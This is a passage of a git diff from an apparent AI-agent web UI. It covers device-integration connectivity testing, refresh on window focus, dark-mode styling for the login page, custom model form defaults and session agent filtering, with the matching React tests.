+- 优化 System Prompt 和输出格式
+- 收敛工具 / Skill 权限
+- 调整温度并验证效果
 
-描述你的需求，我来帮你完善配置。配置好后，点击底部「从 Rex 提取配置」即可自动填入表单。`;
+配置好后，点击引导按钮「从 Rex 提取配置」即可自动填入表单。`;
   }
   return `你好！我来帮你创建一个新的子 Agent。
 
@@ -789,3 +899,28 @@ function parseJsonFromText(text: string): Record<string, any> | null {
 
   return null;
 }
+
+function getModelKeyFromConfig(config: Record<string, any>, fallback: string): string {
+  if (typeof config.modelKey === 'string' && config.modelKey.includes('::')) {
+    return config.modelKey;
+  }
+
+  const model = config.model;
+  if (!model || typeof model !== 'object') {
+    return fallback;
+  }
+
+  const raw = model as Record<string, unknown>;
+  const providerID = typeof raw.providerID === 'string'
+    ? raw.providerID
+    : typeof raw.provider_id === 'string'
+      ? raw.provider_id
+      : '';
+  const modelID = typeof raw.modelID === 'string'
+    ? raw.modelID
+    : typeof raw.model_id === 'string'
+      ? raw.model_id
+      : '';
+
+  return providerID && modelID ? `${providerID}::${modelID}` : fallback;
+}
diff --git a/webui/src/pages/Channel/index.tsx b/webui/src/pages/Channel/index.tsx
index 51e61baf2..963a16693 100644
--- a/webui/src/pages/Channel/index.tsx
+++ b/webui/src/pages/Channel/index.tsx
@@ -1142,7 +1142,7 @@ function DingTalkPanel({ config, onChange }: DingTalkPanelProps) {
           <TextInput
             value={config.clientId ?? ''}
             onChange={(v) => set('clientId', v || undefined)}
-            placeholder="dingtalk_xxxxxxxxxxxxxxxxxx"
+            placeholder="dingxxxxxxxxxxxxxxxx"
           />
         </FieldRow>
         <FieldRow label="Client Secret" required hint={t('dingtalk.clientSecretHint')}>
diff --git a/webui/src/pages/DeviceIntegration/index.test.tsx b/webui/src/pages/DeviceIntegration/index.test.tsx
index e6c6af4b7..6e1c4338d 100644
--- a/webui/src/pages/DeviceIntegration/index.test.tsx
+++ b/webui/src/pages/DeviceIntegration/index.test.tsx
@@ -15,6 +15,7 @@ const mocks = vi.hoisted(() => ({
   sessionId: null as string | null,
   resetSession: vi.fn(),
   listDevices: vi.fn(),
+  syncDevices: vi.fn(),
   getDevice: vi.fn(),
   listGroups: vi.fn(),
   createGroup: vi.fn(),
@@ -52,6 +53,7 @@ vi.mock('react-i18next', () => ({
         'config.roomLabel': '所属机房',
         'config.saveBtn': '保存配置',
         'config.addBtn': '添加设备',
+        'config.testBtn': '连通测试',
         'config.showSecretAction': '显示',
         'config.hideSecretAction': '隐藏',
         'wizard.selectVendorTitle': `选择 ${String(params?.vendor ?? '')} 设备`,
@@ -160,6 +162,7 @@ vi.mock('@/hooks/useSessionChat', () => ({
 vi.mock('@/api/device', () => ({
   deviceAPI: {
     list: (...args: unknown[]) => mocks.listDevices(...args),
+    sync: (...args: unknown[]) => mocks.syncDevices(...args),
     get: (...args: unknown[]) => mocks.getDevice(...args),
     revealCredentials: (...args: unknown[]) => mocks.revealDeviceCredentials(...args),
     listGroups: (...args: unknown[]) => mocks.listGroups(...args),
@@ -211,6 +214,7 @@ describe('DeviceIntegrationPage', () => {
     vi.clearAllMocks();
     mocks.sessionId = null;
     mocks.listDevices.mockResolvedValue({ data: [] });
+    mocks.syncDevices.mockResolvedValue({ data: { created: 0 } });
     mocks.getDevice.mockResolvedValue({
       data: {
         id: 'device-1',
@@ -227,6 +231,9 @@ describe('DeviceIntegrationPage', () => {
         updated_at: 0,
       },
     });
+    mocks.testDevice.mockResolvedValue({
+      data: { success: true, message: 'HTTP 200, 163ms', latency_ms: 163 },
+    });
     mocks.listGroups.mockResolvedValue({
       data: [{ id: 'default', name: '默认机房', sort_order: 0, created_at: 0, updated_at: 0 }],
     });
@@ -240,6 +247,27 @@ describe('DeviceIntegrationPage', () => {
     mocks.refreshTools.mockResolvedValue({ data: { ok: true } });
   });
 
+  it('refreshes devices and templates without syncing when the window regains focus', async () => {
+    render(<DeviceIntegrationPage />);
+
+    await screen.findByText('设备接入');
+    await waitFor(() => {
+      expect(mocks.listDevices).toHaveBeenCalledTimes(1);
+    });
+    mocks.listDevices.mockClear();
+    mocks.listTemplates.mockClear();
+    mocks.listGroups.mockClear();
+
+    window.dispatchEvent(new Event('focus'));
+
+    await waitFor(() => {
+      expect(mocks.listDevices).toHaveBeenCalledWith();
+      expect(mocks.listTemplates).toHaveBeenCalledWith();
+      expect(mocks.listGroups).toHaveBeenCalled();
+    });
+    expect(mocks.syncDevices).not.toHaveBeenCalled();
+  });
+
   it('shows custom device option and access modes', async () => {
     const user = userEvent.setup();
     render(<DeviceIntegrationPage />);
@@ -544,6 +572,109 @@ describe('DeviceIntegrationPage', () => {
     });
   });
 
+  it('tests connectivity with draft fields without replacing the form', async () => {
+    const user = userEvent.setup();
+    const initialDevice = {
+      id: 'device-1',
+      group_id: 'group-1',
+      name: 'onesig-02',
+      storage_key: 'onesig_api_v2_5_3',
+      service_id: 'onesig_api',
+      enabled: true,
+      verify_ssl: false,
+      fields: {
+        base_url: 'https://persisted.example.com',
+        api_prefix: '/api',
+        username: 'admin',
+        password: 'p***word',
+      },
+      fields_set: { base_url: true, api_prefix: true, username: true, password: true },
+      status: 'connected',
+      created_at: 0,
+      updated_at: 0,
+    };
+    mocks.listDevices.mockResolvedValue({ data: [initialDevice] });
+    mocks.listTemplates.mockResolvedValue({
+      data: [
+        buildTemplate({
+          plugin_id: 'onesig_v2_5_3',
+          storage_key: 'onesig_api_v2_5_3',
+          service_id: 'onesig_api',
+          name: 'OneSIG',
+          vendor: 'threatbook',
+        }),
+      ],
+    });
+    mocks.getServiceMetadata.mockResolvedValueOnce({
+      data: {
+        name: 'OneSIG',
+        credential_schema: [
+          {
+            key: 'base_url',
+            label: 'Base URL',
+            storage: 'config',
+            sensitive: false,
+            required: true,
+            input_type: 'url',
+            config_key: 'base_url',
+          },
+          {
+            key: 'api_prefix',
+            label: 'API Prefix',
+            storage: 'config',
+            sensitive: false,
+            required: false,
+            input_type: 'text',
+            config_key: 'api_prefix',
+          },
+          {
+            key: 'username',
+            label: 'Username',
+            storage: 'config',
+            sensitive: false,
+            required: true,
+            input_type: 'text',
+            config_key: 'username',
+          },
+          {
+            key: 'password',
+            label: 'Password',
+            storage: 'secret',
+            sensitive: true,
+            required: true,
+            input_type: 'password',
+            config_key: 'password',
+          },
+        ],
+      },
+    });
+
+    render(<DeviceIntegrationPage />);
+
+    await user.click(await screen.findByText('onesig-02'));
+    const baseUrl = await screen.findByDisplayValue('https://persisted.example.com');
+    await user.clear(baseUrl);
+    await user.type(baseUrl, 'https://draft.example.com');
+    await user.click(screen.getByRole('button', { name: /连通测试/ }));
+
+    await waitFor(() => {
+      expect(mocks.testDevice).toHaveBeenCalledWith('device-1', {
+        fields: expect.objectContaining({
+          base_url: 'https://draft.example.com',
+          api_prefix: '/api',
+          username: 'admin',
+          password: 'p***word',
+        }),
+        verify_ssl: false,
+        base_url: 'https://draft.example.com',
+      });
+    });
+    expect(mocks.getDevice).not.toHaveBeenCalled();
+    expect(mocks.listDevices).toHaveBeenCalledTimes(1);
+    expect(screen.getByDisplayValue('https://draft.example.com')).toBeInTheDocument();
+    expect(await screen.findByText('HTTP 200, 163ms')).toBeInTheDocument();
+  });
+
   it('reveals the full persisted secret when clicking show', async () => {
     const user = userEvent.setup();
     mocks.listDevices.mockResolvedValueOnce({
diff --git a/webui/src/pages/DeviceIntegration/index.tsx b/webui/src/pages/DeviceIntegration/index.tsx
index e90528148..2cf7203b2 100644
--- a/webui/src/pages/DeviceIntegration/index.tsx
+++ b/webui/src/pages/DeviceIntegration/index.tsx
@@ -451,7 +451,7 @@ function Toggle({ on, onToggle }: { on: boolean; onToggle: () => void }) {
 
 function DeviceConfigPanel({
   device, template, vendorKey, initialGroupId, groups, groupLocked,
-  onSave, onDelete, onClose, onTest, onToggleVerifySsl, onToggleEnabled, onBack,
+  onSave, onDelete, onClose, onTest, onBack,
 }: {
   device?: DeviceIntegration;
   template?: DeviceTemplate;
@@ -469,9 +469,7 @@ function DeviceConfigPanel({
   }) => Promise<void>;
   onDelete?: () => Promise<void>;
   onClose: () => void;
-  onTest?: (overrides: { verify_ssl: boolean; base_url?: string }) => Promise<{ success: boolean; message: string }>;
-  onToggleVerifySsl?: (next: boolean) => Promise<void>;
-  onToggleEnabled?: (next: boolean) => Promise<void>;
+  onTest?: (overrides: { fields: Record<string, string>; verify_ssl: boolean; base_url?: string }) => Promise<{ success: boolean; message: string }>;
   onBack?: () => void;
 }) {
   const toast = useToast();
@@ -495,6 +493,7 @@ function DeviceConfigPanel({
   const [metadata, setMetadata] = useState<{ name?: string; version?: string; description?: string; description_cn?: string; docs_url?: string } | null>(null);
   const [toolEnabled, setToolEnabled] = useState<Record<string, boolean>>({});
   const originalMasked = useRef<Record<string, string>>({});
+  const dirtyRef = useRef(false);
 
   const serviceId = device?.service_id ?? template?.service_id ?? '';
   const storageKey = device?.storage_key ?? template?.storage_key ?? '';
@@ -530,7 +529,9 @@ function DeviceConfigPanel({
             }
           });
           originalMasked.current = masked;
-          setFields({ ...device.fields });
+          if (!dirtyRef.current) {
+            setFields({ ...device.fields });
+          }
         } else {
           const defaults: Record<string, string> = {};
           schema.forEach((f) => { if (f.default_value) defaults[f.key] = f.default_value; });
@@ -570,6 +571,7 @@ function DeviceConfigPanel({
         if (payload[k] === masked) payload[k] = '';
       });
       await onSave({ name: name.trim(), fields: payload, enabled, verify_ssl: verifySsl, group_id: groupId });
+      dirtyRef.current = false;
       toast.success(device ? t('toast.saveDone') : t('toast.addDone'));
     } catch {
       toast.error(t('toast.saveFailed'));
@@ -594,6 +596,7 @@ function DeviceConfigPanel({
         }
       }
       setTestResult(await onTest({
+        fields,
         verify_ssl: verifySsl,
         base_url: candidateBaseUrl || undefined,
       }));
@@ -602,30 +605,16 @@ function DeviceConfigPanel({
     }
   };
 
-  const handleToggleSsl = async () => {
+  const handleToggleSsl = () => {
     const next = !verifySsl;
+    dirtyRef.current = true;
     setVerifySsl(next);
-    if (!device || !onToggleVerifySsl) return;
-    try {
-      await onToggleVerifySsl(next);
-      toast.success(next ? t('toast.sslOn') : t('toast.sslOff'));
-    } catch {
-      setVerifySsl(!next);
-      toast.error(t('toast.rollback'));
-    }
   };
 
-  const handleToggleEnabled = async () => {
+  const handleToggleEnabled = () => {
     const next = !enabled;
+    dirtyRef.current = true;
     setEnabled(next);
-    if (!device || !onToggleEnabled) return;
-    try {
-      await onToggleEnabled(next);
-      toast.success(next ? t('toast.enabledOn') : t('toast.enabledOff'));
-    } catch {
-      setEnabled(!next);
-      toast.error(t('toast.rollback'));
-    }
   };
 
   const handleToggleFieldVisibility = async (field: APIServiceCredentialField, hasExisting: boolean) => {
@@ -759,7 +748,10 @@ function DeviceConfigPanel({
                   <input
                     type="text"
                     value={name}
-                    onChange={(e) => setName(e.target.value)}
+                    onChange={(e) => {
+                      dirtyRef.current = true;
+                      setName(e.target.value);
+                    }}
                     placeholder={t('config.namePlaceholder')}
                     className="w-full rounded-lg border border-zinc-200 bg-white px-3 py-2 text-sm text-zinc-900 focus:border-blue-300 focus:outline-none focus:ring-2 focus:ring-blue-100"
                   />
@@ -779,7 +771,10 @@ function DeviceConfigPanel({
                   ) : (
                     <select
                       value={groupId}
-                      onChange={(e) => setGroupId(e.target.value)}
+                      onChange={(e) => {
+                        dirtyRef.current = true;
+                        setGroupId(e.target.value);
+                      }}
                       className="w-full rounded-lg border border-zinc-200 bg-white px-3 py-2 text-sm text-zinc-900 focus:border-blue-300 focus:outline-none focus:ring-2 focus:ring-blue-100"
                     >
                       {groups.map((g) => (
@@ -807,7 +802,10 @@ function DeviceConfigPanel({
                             <input
                               type={isSecret && !show ? 'password' : 'text'}
                               value={fields[f.key] ?? ''}
-                              onChange={(e) => setFields((p) => ({ ...p, [f.key]: e.target.value }))}
+                              onChange={(e) => {
+                                dirtyRef.current = true;
+                                setFields((p) => ({ ...p, [f.key]: e.target.value }));
+                              }}
                               placeholder={f.default_value ?? ''}
                               className="w-full rounded-lg border border-zinc-200 bg-white px-3 py-2 text-sm text-zinc-900 focus:border-blue-300 focus:outline-none focus:ring-2 focus:ring-blue-100 pr-10"
                             />
@@ -1215,8 +1213,8 @@ function GroupSidebar({ groups, devices, selectedGroupId, onSelect, onRename, on
 
                   {/* Hover action buttons */}
                   <div
-                    className="absolute right-1 inset-y-0 hidden group-hover/room:flex items-center gap-0.5 pl-4"
-                    style={{ background: `linear-gradient(to right, transparent, ${isSelected ? '#eff6ff' : '#f4f4f5'} 35%)` }}
+                    className="device-room-actions-fade absolute right-1 inset-y-0 hidden group-hover/room:flex items-center gap-0.5 pl-4"
+                    data-selected={isSelected ? 'true' : 'false'}
                   >
                     <button
                       onClick={(e) => startEdit(group, e)}
@@ -1302,6 +1300,7 @@ export default function DeviceIntegrationPage() {
   const [loading, setLoading] = useState(true);
   const [refreshing, setRefreshing] = useState(false);
   const [panel, setPanel] = useState<PanelMode>(null);
+  const lastRefreshRef = useRef(0);
   // null = "全部机房" aggregate view; string = specific group id
   const [selectedGroupId, setSelectedGroupId] = useState<string | null>(null);
   // Group ids whose section is collapsed in the "全部机房" view. Default
@@ -1332,9 +1331,12 @@ export default function DeviceIntegrationPage() {
     if (!silent) setLoading(true);
     else setRefreshing(true);
     try {
+      if (refreshTemplates) {
+        await deviceAPI.sync({ refresh: true });
+      }
       const [devRes, tplRes, grpRes] = await Promise.all([
-        deviceAPI.list(refreshTemplates ? { refresh: true } : undefined),
-        deviceAPI.listTemplates(refreshTemplates ? { refresh: true } : undefined),
+        deviceAPI.list(),
+        deviceAPI.listTemplates(),
         deviceAPI.listGroups(),
       ]);
       const nextTemplates = tplRes.data || [];
@@ -1353,6 +1355,31 @@ export default function DeviceIntegrationPage() {
 
   useEffect(() => { void fetchData(); }, [fetchData]);
 
+  const refreshOnResume = useCallback(() => {
+    const now = Date.now();
+    if (now - lastRefreshRef.current < 1000) return;
+    lastRefreshRef.current = now;
+    void fetchData(true);
+  }, [fetchData]);
+
+  useEffect(() => {
+    const handleVisibilityChange = () => {
+      if (document.visibilityState === 'visible') {
+        refreshOnResume();
+      }
+    };
+    const handleWindowFocus = () => {
+      refreshOnResume();
+    };
+
+    document.addEventListener('visibilitychange', handleVisibilityChange);
+    window.addEventListener('focus', handleWindowFocus);
+    return () => {
+      document.removeEventListener('visibilitychange', handleVisibilityChange);
+      window.removeEventListener('focus', handleWindowFocus);
+    };
+  }, [refreshOnResume]);
+
   // Count instances per storage_key (for wizard display)
   const instanceCounts = useMemo(() => {
     const counts: Record<string, number> = {};
@@ -1468,33 +1495,23 @@ export default function DeviceIntegrationPage() {
     await fetchData(true);
   };
 
-  const handleTest = async (overrides: { verify_ssl: boolean; base_url?: string }) => {
+  const handleTest = async (overrides: { fields: Record<string, string>; verify_ssl: boolean; base_url?: string }) => {
     if (panel?.kind !== 'edit') return { success: false, message: '' };
     const res = await deviceAPI.test(panel.device.id, overrides);
-    await fetchData(true);
-    if (panel?.kind === 'edit') {
-      const updated = await deviceAPI.get(panel.device.id);
-      setPanel({ kind: 'edit', device: updated.data });
-    }
+    setDevices((current) => current.map((device) => (
+      device.id === panel.device.id
+        ? {
+            ...device,
+            status: res.data.success ? 'ok' : 'error',
+            message: res.data.message,
+            latency_ms: res.data.latency_ms ?? null,
+            checked_at: Date.now(),
+          }
+        : device
+    )));
     return res.data;
   };
 
-  const handleToggleVerifySsl = async (next: boolean) => {
-    if (panel?.kind !== 'edit') return;
-    await deviceAPI.update(panel.device.id, { verify_ssl: next });
-    const updated = await deviceAPI.get(panel.device.id);
-    setPanel({ kind: 'edit', device: updated.data });
-    await fetchData(true);
-  };
-
-  const handleToggleEnabled = async (next: boolean) => {
-    if (panel?.kind !== 'edit') return;
-    await deviceAPI.update(panel.device.id, { enabled: next });
-    const updated = await deviceAPI.get(panel.device.id);
-    setPanel({ kind: 'edit', device: updated.data });
-    await fetchData(true);
-  };
-
   // ──────────────────────────────────────────────────────────────────────────
   // Group to use when adding a new device (follows sidebar selection).
   // In "全部机房" view (null), pre-select the first available group so the
@@ -1818,8 +1835,6 @@ export default function DeviceIntegrationPage() {
             onDelete={panel.kind === 'edit' ? handleDelete : undefined}
             onClose={() => setPanel(null)}
             onTest={panel.kind === 'edit' ? handleTest : undefined}
-            onToggleVerifySsl={panel.kind === 'edit' ? handleToggleVerifySsl : undefined}
-            onToggleEnabled={panel.kind === 'edit' ? handleToggleEnabled : undefined}
             onBack={panel.kind === 'add'
               ? () => setPanel({
                   kind: 'wizard',
diff --git a/webui/src/pages/Login/index.tsx b/webui/src/pages/Login/index.tsx
index a809d29ef..652fc9b5a 100644
--- a/webui/src/pages/Login/index.tsx
+++ b/webui/src/pages/Login/index.tsx
@@ -34,25 +34,25 @@ export default function LoginPage() {
     <AuthLayout>
       <form
         onSubmit={onSubmit}
-        className="w-full max-w-md bg-white border border-gray-200 rounded-xl p-6 shadow-sm space-y-4"
+        className="w-full max-w-md bg-white border border-gray-200 rounded-xl p-6 shadow-sm space-y-4 dark:border-[#4a5563] dark:bg-[#303842] dark:shadow-xl dark:shadow-black/20"
       >
         <div>
-          <h1 className="text-xl font-semibold text-gray-900">{t('login.title')}</h1>
-          <p className="text-sm text-gray-500 mt-1">{t('login.description')}</p>
+          <h1 className="text-xl font-semibold text-gray-900 dark:text-[#d7dee8]">{t('login.title')}</h1>
+          <p className="text-sm text-gray-500 mt-1 dark:text-[#b8c2cc]">{t('login.description')}</p>
         </div>
         <div>
-          <label className="text-sm text-gray-700 block mb-1">{t('fields.username')}</label>
+          <label className="text-sm text-gray-700 block mb-1 dark:text-[#d7dee8]">{t('fields.username')}</label>
           <input
             value={username}
             onChange={(e) => setUsername(e.target.value)}
-            className="w-full border border-gray-300 rounded-lg px-3 py-2 outline-none focus:border-blue-500"
+            className="w-full border border-gray-300 rounded-lg px-3 py-2 outline-none focus:border-blue-500 dark:border-[#4a5563] dark:bg-[#252c35] dark:text-[#d7dee8] dark:placeholder:text-[#9aa7b4] dark:focus:border-[#539bf5]"
             placeholder={t('fields.usernamePlaceholder')}
             autoComplete="username"
             required
           />
         </div>
         <div>
-          <label className="text-sm text-gray-700 block mb-1">{t('fields.password')}</label>
+          <label className="text-sm text-gray-700 block mb-1 dark:text-[#d7dee8]">{t('fields.password')}</label>
           <PasswordInput
             value={password}
             onChange={(e) => setPassword(e.target.value)}
@@ -62,27 +62,27 @@ export default function LoginPage() {
           />
         </div>
         {error && (
-          <div className="text-sm text-red-600 bg-red-50 border border-red-200 rounded-lg px-3 py-2">
+          <div className="text-sm text-red-600 bg-red-50 border border-red-200 rounded-lg px-3 py-2 dark:border-red-400/30 dark:bg-red-500/15 dark:text-red-200">
             {error}
           </div>
         )}
         <button
           type="submit"
           disabled={submitting}
-          className="w-full bg-slate-900 text-white rounded-lg py-2.5 font-medium hover:bg-slate-800 disabled:opacity-60"
+          className="w-full bg-slate-900 text-white rounded-lg py-2.5 font-medium hover:bg-slate-800 disabled:opacity-60 dark:bg-[#46515e] dark:hover:bg-[#5a6573]"
         >
           {submitting ? t('actions.loggingIn') : t('actions.login')}
         </button>
-        <div className="space-y-2 text-xs text-gray-500 border-t border-gray-100 pt-3">
+        <div className="space-y-2 text-xs text-gray-500 border-t border-gray-100 pt-3 dark:border-[#4a5563] dark:text-[#b8c2cc]">
           <div>
             {t('login.recoverUsername')}
             {' '}
-            <code className="rounded bg-gray-100 px-1.5 py-0.5 text-gray-700">flocks admin list-users</code>
+            <code className="rounded bg-gray-100 px-1.5 py-0.5 text-gray-700 dark:bg-[#46515e] dark:text-[#d7dee8]">flocks admin list-users</code>
           </div>
           <div>
             {t('login.recoverPassword')}
             {' '}
-            <code className="rounded bg-gray-100 px-1.5 py-0.5 text-gray-700">flocks admin generate-one-time-password --username admin</code>
+            <code className="rounded bg-gray-100 px-1.5 py-0.5 text-gray-700 dark:bg-[#46515e] dark:text-[#d7dee8]">flocks admin generate-one-time-password --username admin</code>
           </div>
         </div>
       </form>
diff --git a/webui/src/pages/Model/index.tsx b/webui/src/pages/Model/index.tsx
index d74b865bc..8175777a6 100644
--- a/webui/src/pages/Model/index.tsx
+++ b/webui/src/pages/Model/index.tsx
@@ -31,6 +31,7 @@ import {
 import type {
   ProviderCredentials, ModelDefinitionV2, UsageStats,
   CatalogProvider, CatalogModel, CatalogCredentialField, ModelSettingV2,
+  CustomModelCreate,
 } from '@/types';
 
 // ==================== Provider Auth Helpers ====================
@@ -1828,8 +1829,8 @@ function CatalogModelBadges({ model }: { model: CatalogModel }) {
 function useModelForm() {
   const [modelId, setModelId] = useState('');
   const [name, setName] = useState('');
-  const [contextWindow, setContextWindow] = useState('128000');
-  const [maxOutput, setMaxOutput] = useState('128000');
+  const [contextWindow, setContextWindow] = useState('');
+  const [maxOutput, setMaxOutput] = useState('');
   const [supportsVision, setSupportsVision] = useState(false);
   const [supportsTools, setSupportsTools] = useState(true);
   const [supportsStreaming, setSupportsStreaming] = useState(true);
@@ -1840,25 +1841,34 @@ function useModelForm() {
 
   const reset = useCallback(() => {
     setModelId(''); setName('');
-    setContextWindow('128000'); setMaxOutput('128000');
+    setContextWindow(''); setMaxOutput('');
     setSupportsVision(false); setSupportsTools(true);
     setSupportsStreaming(true); setSupportsReasoning(true);
     setInputPrice('0'); setOutputPrice('0'); setCurrency('USD');
   }, []);
 
-  const toPayload = useCallback(() => ({
-    model_id: modelId.trim(),
-    name: name.trim(),
-    context_window: parseInt(contextWindow) || 128000,
-    max_output_tokens: parseInt(maxOutput) || 4096,
-    supports_vision: supportsVision,
-    supports_tools: supportsTools,
-    supports_streaming: supportsStreaming,
-    supports_reasoning: supportsReasoning,
-    input_price: parseFloat(inputPrice) || 0,
-    output_price: parseFloat(outputPrice) || 0,
-    currency,
-  }), [modelId, name, contextWindow, maxOutput, supportsVision, supportsTools, supportsStreaming, supportsReasoning, inputPrice, outputPrice, currency]);
+  const toPayload = useCallback(() => {
+    const payload: CustomModelCreate = {
+      model_id: modelId.trim(),
+      name: name.trim(),
+      supports_vision: supportsVision,
+      supports_tools: supportsTools,
+      supports_streaming: supportsStreaming,
+      supports_reasoning: supportsReasoning,
+      input_price: parseFloat(inputPrice) || 0,
+      output_price: parseFloat(outputPrice) || 0,
+      currency,
+    };
+    const parsedContextWindow = parseInt(contextWindow);
+    if (Number.isFinite(parsedContextWindow) && parsedContextWindow > 0) {
+      payload.context_window = parsedContextWindow;
+    }
+    const parsedMaxOutput = parseInt(maxOutput);
+    if (Number.isFinite(parsedMaxOutput) && parsedMaxOutput > 0) {
+      payload.max_output_tokens = parsedMaxOutput;
+    }
+    return payload;
+  }, [modelId, name, contextWindow, maxOutput, supportsVision, supportsTools, supportsStreaming, supportsReasoning, inputPrice, outputPrice, currency]);
 
   const isValid = modelId.trim() !== '' && name.trim() !== '';
 
@@ -1893,7 +1903,7 @@ function ModelFormFields({ form, testResult, testing, modelIdPlaceholder, modelI
             value={form.modelId}
             onChange={e => form.setModelId(e.target.value)}
             className="w-full px-3 py-2 border border-gray-300 rounded-lg focus:outline-none focus:ring-2 focus:ring-slate-400 text-sm"
-            placeholder={modelIdPlaceholder || 'gpt-4o-custom'}
+            placeholder={modelIdPlaceholder || 'model-id'}
           />
           {modelIdHint && <p className="mt-1 text-xs text-gray-500">{modelIdHint}</p>}
         </div>
@@ -1906,7 +1916,7 @@ function ModelFormFields({ form, testResult, testing, modelIdPlaceholder, modelI
             value={form.name}
             onChange={e => form.setName(e.target.value)}
             className="w-full px-3 py-2 border border-gray-300 rounded-lg focus:outline-none focus:ring-2 focus:ring-slate-400 text-sm"
-            placeholder="GPT-4o Custom"
+            placeholder="model-name"
           />
         </div>
       </div>
@@ -1919,6 +1929,7 @@ function ModelFormFields({ form, testResult, testing, modelIdPlaceholder, modelI
             value={form.contextWindow}
             onChange={e => form.setContextWindow(e.target.value)}
             className="w-full px-3 py-2 border border-gray-300 rounded-lg focus:outline-none focus:ring-2 focus:ring-slate-400 text-sm"
+            placeholder="Auto"
           />
         </div>
         <div>
@@ -1928,6 +1939,7 @@ function ModelFormFields({ form, testResult, testing, modelIdPlaceholder, modelI
             value={form.maxOutput}
             onChange={e => form.setMaxOutput(e.target.value)}
             className="w-full px-3 py-2 border border-gray-300 rounded-lg focus:outline-none focus:ring-2 focus:ring-slate-400 text-sm"
+            placeholder="Auto"
           />
         </div>
       </div>
diff --git a/webui/src/pages/Session/index.test.tsx b/webui/src/pages/Session/index.test.tsx
index 0a90ba5ef..0c6703358 100644
--- a/webui/src/pages/Session/index.test.tsx
+++ b/webui/src/pages/Session/index.test.tsx
@@ -93,24 +93,37 @@ vi.mock('@/components/common/SessionChat', () => ({
     toolbarSlot,
     centerToolbarSlot,
     onCreateAndSend,
+    agentName,
     model,
+    display,
   }: {
     sessionId?: string | null;
+    agentName?: string;
     mentionAgents?: Array<{ name: string }>;
     toolbarSlot?: React.ReactNode;
     centerToolbarSlot?: React.ReactNode;
     model?: { providerID: string; modelID: string } | null;
+    display?: {
+      compact?: boolean;
+      showActions?: boolean;
+      showTimestamp?: boolean;
+      collapseIntermediateSteps?: boolean;
+      processGroupsDefaultOpen?: boolean;
+    };
     onCreateAndSend?: (text: string, imageParts?: unknown[], agentOverride?: string) => Promise<unknown> | unknown;
   }) => (
     <div
       data-testid="session-chat"
+      data-agent-name={agentName ?? ''}
       data-mention-agents={(mentionAgents ?? []).map((a) => a.name).join(',')}
       data-model={model ? `${model.providerID}/${model.modelID}` : ''}
+      data-collapse-intermediate={String(Boolean(display?.collapseIntermediateSteps))}
+      data-process-groups-default-open={String(Boolean(display?.processGroupsDefaultOpen))}
     >
       {sessionId ?? 'no-session'}
       {toolbarSlot}
       {centerToolbarSlot}
-      <button type="button" onClick={() => void onCreateAndSend?.('hello from empty session')}>
+      <button type="button" onClick={() => void onCreateAndSend?.('hello from empty session', [], agentName)}>
         mock-create-and-send
       </button>
     </div>
@@ -120,6 +133,12 @@ vi.mock('@/components/common/SessionChat', () => ({
 vi.mock('@/utils/agentDisplay', () => ({
   getAgentDisplayDescription: () => 'agent-description',
   getAgentDisplayName: (agent: { name: string }) => agent.name.charAt(0).toUpperCase() + agent.name.slice(1),
+  isAgentUsableInChat: (agent: { mode?: string; hidden?: boolean; delegatable?: boolean; tags?: string[] }) => (
+    Boolean(agent)
+    && !agent.hidden
+    && !(agent.tags ?? []).includes('system')
+    && (agent.mode === 'primary' || agent.delegatable !== false)
+  ),
 }));
 
 vi.mock('@/utils/time', () => ({
@@ -373,6 +392,15 @@ describe('SessionPage session actions menu', () => {
     expect(screen.getByTestId('session-chat')).toHaveTextContent('session-1');
   });
 
+  it('defaults session process groups open on the session management page', () => {
+    localStorage.setItem('flocks:last-selected-session', 'session-1');
+
+    renderSessionPage();
+
+    expect(screen.getByTestId('session-chat')).toHaveAttribute('data-collapse-intermediate', 'true');
+    expect(screen.getByTestId('session-chat')).toHaveAttribute('data-process-groups-default-open', 'true');
+  });
+
   it('syncs selected session when query param changes after mount', async () => {
     const user = userEvent.setup();
 
@@ -445,6 +473,17 @@ describe('SessionPage session actions menu', () => {
           skills: [],
           tools: [],
         },
+        {
+          name: 'oracle',
+          description: 'Oracle',
+          mode: 'subagent',
+          native: true,
+          delegatable: false,
+          permission: [],
+          options: {},
+          skills: [],
+          tools: [],
+        },
       ],
       loading: false,
       error: null,
@@ -459,6 +498,7 @@ describe('SessionPage session actions menu', () => {
 
     expect(screen.getByRole('button', { name: /Explore/i })).toBeInTheDocument();
     expect(screen.queryByRole('button', { name: /hidden-system/i })).not.toBeInTheDocument();
+    expect(screen.queryByRole('button', { name: /Oracle/i })).not.toBeInTheDocument();
   });
 
   it('resets the chat agent to Rex when creating a new session', async () => {
@@ -629,7 +669,7 @@ describe('SessionPage session actions menu', () => {
     });
   });
 
-  it('uses Rex for the first message when an empty session is created by sending', async () => {
+  it('uses the selected agent for the first message when an empty session is created by sending', async () => {
     const user = userEvent.setup();
     useAgents.mockReturnValue({
       agents: [
@@ -668,9 +708,9 @@ describe('SessionPage session actions menu', () => {
     await waitFor(() => {
       expect(client.post).toHaveBeenCalledWith(
         '/api/session/session-2/prompt_async',
-        expect.objectContaining({ agent: 'rex' }),
+        expect.objectContaining({ agent: 'explore' }),
       );
     });
-    expect(screen.getByRole('button', { name: /Rex/i })).toBeInTheDocument();
+    expect(screen.getByRole('button', { name: /Explore/i })).toBeInTheDocument();
   });
 });
diff --git a/webui/src/pages/Session/index.tsx b/webui/src/pages/Session/index.tsx
index b577b5063..0c1a731a7 100644
--- a/webui/src/pages/Session/index.tsx
+++ b/webui/src/pages/Session/index.tsx
@@ -21,7 +21,7 @@ import client from '@/api/client';
 import { defaultModelAPI, modelV2API } from '@/api/provider';
 import { useDefaultModelVision } from '@/hooks/useDefaultModelVision';
 import { buildPromptParts, type ImagePartData } from '@/utils/imageUpload';
-import { getAgentDisplayDescription, getAgentDisplayName } from '@/utils/agentDisplay';
+import { getAgentDisplayDescription, getAgentDisplayName, isAgentUsableInChat } from '@/utils/agentDisplay';
 import { formatSessionDate } from '@/utils/time';
 import type { ModelDefinitionV2 } from '@/types';
 
@@ -122,9 +122,9 @@ export default function SessionPage() {
   const { sessions, loading: loadingSessions, refetch: refetchSessions, updateSessionTitle, removeSession, removeSessions, addSession } = useSessions();
   const { agents, loading: loadingAgents } = useAgents();
   const { providers, loading: loadingProviders } = useProviders();
-  const primaryAgents = useMemo(() => agents.filter((a) => a.mode === 'primary'), [agents]);
+  const primaryAgents = useMemo(() => agents.filter((a) => a.mode === 'primary' && isAgentUsableInChat(a)), [agents]);
   const subAgents = useMemo(
-    () => agents.filter((a) => a.mode !== 'primary' && !(a.tags ?? []).includes('system')),
